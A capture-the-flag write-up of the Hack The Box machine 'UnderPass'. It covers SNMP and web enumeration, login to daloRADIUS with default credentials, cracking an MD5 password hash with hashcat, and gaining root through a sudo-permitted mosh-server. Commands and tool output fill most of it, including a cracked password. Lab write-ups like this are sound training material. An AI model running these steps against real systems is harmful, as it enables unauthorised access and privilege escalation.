UnderPass
Synopsis
UnderPass is a linux easy machine created by dakkmaddy. The UDP port 161 is running SNMP service. The enumeration to SNMP reveals the daloradius server is used in the website and enumerating daloradius github repository the login page for users and operators are found. The default credential for daloradius gives us access to daloradius dashboard as an operator. The hash for user svcMosh is present in the user list. Crack the hash and login into system via ssh as svcMosh. The svcMosh user is privileged to use mosh-server as sudo which will be exploited for getting shell as root.
OS
Difficulty
Points
Release Date
Expire Date
Linux
Easy
20
21-12-2024
10-May-2025
Enumeration
Nmap
Started the nmap scan and found ssh and http services running.
nmap -Pn -sC -sV --min-rate=1000 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 06:54 EDT
Nmap scan report for 10.10.11.48
Host is up (0.74s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.05 secondsScanning the UDP ports reveals the snmp service running.
nmap -Pn -sU --min-rate=5000 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 07:31 EDT
Nmap scan report for 10.10.11.48
Host is up (0.67s latency).
Not shown: 988 open|filtered udp ports (no-response)
PORT STATE SERVICE
22/udp closed ssh
161/udp open snmp
1419/udp closed timbuktu-srv3
1433/udp closed ms-sql-s
2222/udp closed msantipiracy
5010/udp closed telelpathstart
10080/udp closed amanda
17101/udp closed unknown
20117/udp closed unknown
20288/udp closed unknown
49188/udp closed unknown
49199/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 26.50 secondsnmap -Pn -sU -sC -sV -p 161 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 07:32 EDT
Nmap scan report for 10.10.11.48
Host is up (0.60s latency).
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: c7ad5c4856d1cf6600000000
| snmpEngineBoots: 31
|_ snmpEngineTime: 15h30m56s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_ System uptime: 15h30m57.39s (5585739 timeticks)
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.51 secondsSNMP - Port 161
snmpwalk reveals steve@underpass.htb mail and UnDerPass.htb is only the daloradius server.
snmpwalk -v 2c -c public 10.10.11.48
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (6896383) 19:09:23.83
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (6899041) 19:09:50.41
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 05 0F 0E 32 0E 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 1
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 225
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)Web - Port 80
The website shows the default apache2 server page.
Fuzzing - Directories and Pages
feroxbuster -u http://10.10.11.48
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.48
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 22l 105w 5952c http://10.10.11.48/icons/ubuntu-logo.png
200 GET 363l 961w 10671c http://10.10.11.48/
[####################] - 10m 30005/30005 0s found:2 errors:1470
[####################] - 10m 30000/30000 51/s http://10.10.11.48/ The fuzzing didn't give us much of the stuff. The snmp mentioned the daloradius server. Fuzzing directories and pages. So trying with adding daloradius server.
feroxbuster -u http://10.10.11.48/daloradius
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.48/daloradius
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 315c http://10.10.11.48/daloradius => http://10.10.11.48/daloradius/
301 GET 9l 28w 323c http://10.10.11.48/daloradius/library => http://10.10.11.48/daloradius/library/
301 GET 9l 28w 319c http://10.10.11.48/daloradius/doc => http://10.10.11.48/daloradius/doc/
301 GET 9l 28w 319c http://10.10.11.48/daloradius/app => http://10.10.11.48/daloradius/app/
301 GET 9l 28w 323c http://10.10.11.48/daloradius/contrib => http://10.10.11.48/daloradius/contrib/
301 GET 9l 28w 326c http://10.10.11.48/daloradius/app/common => http://10.10.11.48/daloradius/app/common/
301 GET 9l 28w 325c http://10.10.11.48/daloradius/app/users => http://10.10.11.48/daloradius/app/users/
301 GET 9l 28w 321c http://10.10.11.48/daloradius/setup => http://10.10.11.48/daloradius/setup/
301 GET 9l 28w 335c http://10.10.11.48/daloradius/app/common/includes => http://10.10.11.48/daloradius/app/common/includes/
301 GET 9l 28w 332c http://10.10.11.48/daloradius/app/users/static => http://10.10.11.48/daloradius/app/users/static/
301 GET 9l 28w 330c http://10.10.11.48/daloradius/app/users/lang => http://10.10.11.48/daloradius/app/users/lang/
301 GET 9l 28w 333c http://10.10.11.48/daloradius/app/users/library => http://10.10.11.48/daloradius/app/users/library/
301 GET 9l 28w 333c http://10.10.11.48/daloradius/app/common/static => http://10.10.11.48/daloradius/app/common/static/
301 GET 9l 28w 336c http://10.10.11.48/daloradius/app/common/templates => http://10.10.11.48/daloradius/app/common/templates/
301 GET 9l 28w 333c http://10.10.11.48/daloradius/app/users/include => http://10.10.11.48/daloradius/app/users/include/
301 GET 9l 28w 331c http://10.10.11.48/daloradius/contrib/scripts => http://10.10.11.48/daloradius/contrib/scripts/
301 GET 9l 28w 344c http://10.10.11.48/daloradius/app/users/library/javascript => http://10.10.11.48/daloradius/app/users/library/javascript/
301 GET 9l 28w 340c http://10.10.11.48/daloradius/app/common/static/images => http://10.10.11.48/daloradius/app/common/static/images/
301 GET 9l 28w 336c http://10.10.11.48/daloradius/app/common/static/js => http://10.10.11.48/daloradius/app/common/static/js/
301 GET 9l 28w 337c http://10.10.11.48/daloradius/app/common/static/css => http://10.10.11.48/daloradius/app/common/static/css/
301 GET 9l 28w 326c http://10.10.11.48/daloradius/contrib/db => http://10.10.11.48/daloradius/contrib/db/
301 GET 9l 28w 340c http://10.10.11.48/daloradius/app/users/include/config => http://10.10.11.48/daloradius/app/users/include/config/
301 GET 9l 28w 340c http://10.10.11.48/daloradius/app/users/include/common => http://10.10.11.48/daloradius/app/users/include/common/
301 GET 9l 28w 333c http://10.10.11.48/daloradius/contrib/heartbeat => http://10.10.11.48/daloradius/contrib/heartbeat/
[####################] - 15m 540094/540094 0s found:24 errors:298324
[####################] - 10m 30000/30000 53/s http://10.10.11.48/daloradius/
[####################] - 10m 30000/30000 50/s http://10.10.11.48/daloradius/app/
[####################] - 10m 30000/30000 48/s http://10.10.11.48/daloradius/library/
[####################] - 10m 30000/30000 48/s http://10.10.11.48/daloradius/doc/
[####################] - 9m 30000/30000 57/s http://10.10.11.48/daloradius/contrib/
[####################] - 11m 30000/30000 45/s http://10.10.11.48/daloradius/app/common/
[####################] - 11m 30000/30000 45/s http://10.10.11.48/daloradius/app/users/
[####################] - 10m 30000/30000 49/s http://10.10.11.48/daloradius/setup/
[####################] - 5m 30000/30000 101/s http://10.10.11.48/daloradius/app/common/templates/ daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.
The daloradius github repository shows the users and operators login.php page and requesting the login.php gives us the daloradius login page.
Foothold
Shell - svcMosh
Web surfing about daloradius default credentials presents Administrator:radius credential and the credentials is valid for operator.
The daloradius dashboard provides the user list. Only svcMosh user and it's hash is present.
Cracking hash using hashcat.
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 2 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
412dd4759978acfcc81deab01b382403:underwaterfriends
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 412dd4759978acfcc81deab01b382403
Time.Started.....: Fri May 16 01:07:49 2025 (1 sec)
Time.Estimated...: Fri May 16 01:07:50 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4260.1 kH/s (0.21ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2985984/14344385 (20.82%)
Rejected.........: 0/2985984 (0.00%)
Restore.Point....: 2981888/14344385 (20.79%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: unicornn -> unc112886
Hardware.Mon.#1..: Temp: 47c Util: 25%
Started: Fri May 16 01:07:47 2025
Stopped: Fri May 16 01:07:51 2025Using the cracked password to login into svcMosh via ssh.
sh svcMosh@10.10.11.48
The authenticity of host '10.10.11.48 (10.10.11.48)' can't be established.
ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.48' (ED25519) to the list of known hosts.
svcMosh@10.10.11.48's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri May 16 04:50:00 AM UTC 2025
System load: 0.0 Processes: 226
Usage of /: 52.2% of 6.56GB Users logged in: 0
Memory usage: 10% IPv4 address for eth0: 10.10.11.48
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Jan 11 13:29:47 2025 from 10.10.14.62
svcMosh@underpass:~$ Privilege Escalation
Pillaging - svcMosh [ user ]
The svcMosh user is privilege to run /usr/bin/mosh-server as sudo.
svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server
svcMosh@underpass:~$ Shell - root
Mosh is a mobile shell tool used to connect from a client computer to a server over the Internet, similar to SSH but with additional features meant to improve usability for mobile users.
Running the mosh-server as sudo gives us port and mosh key.
svcMosh@underpass:~$ sudo mosh-server
MOSH CONNECT 60001 xZmrCtUg7/lhYpY82VEQEg
mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
[mosh-server detached, pid = 2857]
svcMosh@underpass:~$Connecting to the port 60001 using mosh-client gives us MOSH_KEY environment variable not found error. Create the MOSH_KEY environment variable and running the mosh-client.
svcMosh@underpass:~$ MOSH_KEY=a7JjCnxWIsnm8/fv2se4ow mosh-client 127.0.0.1 60002Nothing received from server on UDP port 60002 occurs sometimes so we have to again run the mosh-server.
root@underpass:~# ls
root.txt
root@underpass:~# Proof of Concept
The below video provides the PoC of UnderPass machine.
Last updated